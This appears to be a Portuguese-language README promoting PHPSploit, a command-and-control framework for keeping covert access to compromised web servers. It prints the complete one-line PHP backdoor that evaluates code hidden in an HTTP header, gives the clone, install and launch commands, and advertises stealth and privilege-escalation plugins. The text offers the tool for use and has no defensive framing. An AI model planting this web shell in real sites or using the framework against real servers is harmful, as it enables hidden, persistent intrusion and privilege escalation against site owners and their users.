
Framework C2 completo que persiste silenciosamente em servidor web com um backdoor PHP de uma única linha.
A comunicação ofuscada é realizada usando cabeçalhos HTTP em solicitações padrão do cliente e respostas relativas do servidor web, tunelada através de um pequeno backdoor polimórfico:
<?php @eval($_SERVER['HTTP_PHPSPL01T']); ?>
git clone https://github.com/nil0x42/phpsploit
cd phpsploit/
pip3 install -r requirements.txt
./phpsploit --interactive --eval "help help"
Eficiente: Mais de 20 plugins para automatizar tarefas de escalada de privilégios
Furtivo: O framework é feito por paranóicos, para paranóicos
Conveniente: Uma interface robusta com muitos recursos cruciais
help)Agradecimentos a estas pessoas maravilhosas:
Este projeto segue a especificação all-contributors. Contribuições de qualquer tipo são bem-vindas
![]() nil0x42 💻 🚇 🔌 ⚠️ | ![]() shiney-wh 💻 🔌 | ![]() Wannes Rombouts 💻 🚧 | ![]() Amine Ben Asker 💻 🚧 | ![]() jose nazario 📖 🐛 | ![]() Sujit Ghosal 📝 | ![]() Zerdoumi 🐛 |
![]() tristandostaler 🐛 | ![]() Rohan Tarai 🐛 | ![]() Jonas Lejon 📝 |